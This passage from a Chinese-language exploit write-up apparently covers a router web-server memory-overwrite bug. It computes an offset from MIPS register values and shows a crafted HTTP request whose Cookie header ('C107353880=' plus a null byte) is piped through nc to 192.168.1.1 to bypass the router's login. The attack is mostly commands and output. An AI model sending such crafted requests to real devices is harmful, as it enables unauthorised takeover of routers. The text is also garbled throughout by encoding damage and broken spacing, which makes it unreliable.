好了， 正如我們想要實(shí)現(xiàn)的，EPC為 0×00000000。除此之外$s7的值為0x8040F8AC 也就是我們所尋找的$s4的值

現(xiàn)在，我們知道了$s4的值為0x8040F8AC，還有$t5的值為0x804163D4，即0x804163D4是對目的地址進(jìn)行寫操作的基址。因?yàn)槲覀冃枰�覆蓋0x8034FF94的值，所以：

0x8034FF94- 0x804163D4 = 0xFFF39BC0     # do thisin dword 0xFFF39BC0% 0x28 = 0                   # do this inqword 0xFFF39BC0/ 0x28 = 0x06661718           # do thisin qword 0x06661718= 107353880 (in decimal)

因?yàn)榈刂?x8034FF94正好是0×28字節(jié)對齊的chunk中的地一個(gè)字節(jié)，以至于我們只能通過null(0×00)覆蓋一個(gè)字節(jié)。然而，如果我們通過curl給路由發(fā)送一個(gè)特別構(gòu)造的數(shù)據(jù)包是有點(diǎn)不恰當(dāng)，因?yàn)閏url會(huì)用0x0d0a0d0a填充header。作為替代用nc來發(fā)送特別構(gòu)造的數(shù)據(jù)包是一個(gè)更好的選擇。將這個(gè)特別構(gòu)造的數(shù)據(jù)包定義成一個(gè)文件再通過管道傳到nc再發(fā)送至路由來遠(yuǎn)程“解鎖”。讓我們現(xiàn)在來試試

cawan$ cat./cawan_header | xxd 0000000:4745 5420 2f20 4854 5450 2f31 2e31 0a55 GET / HTTP/1.1.U 0000010:7365 722d 4167 656e 743a 2063 7572 6c2f ser-Agent: curl/ 0000020:372e 3333 2e30 0a48 6f73 743a 2031 3932 7.33.0.Host: 192 0000030:2e31 3638 2e31 2e31 0a41 6363 6570 743a .168.1.1.Accept: 0000040:202a 2f2a 0a43 6f6f 6b69 653a 2043 3130  */*.Cookie: C10 0000050:3733 3533 3838 303d 000a                7353880=..cawan$curl 192.168.1.1

ProtectedObject

Usernameor Password errorcawan$ cawan$ catcawan_header | nc 192.168.1.1 80 cawan$cawan$curl 192.168.1.1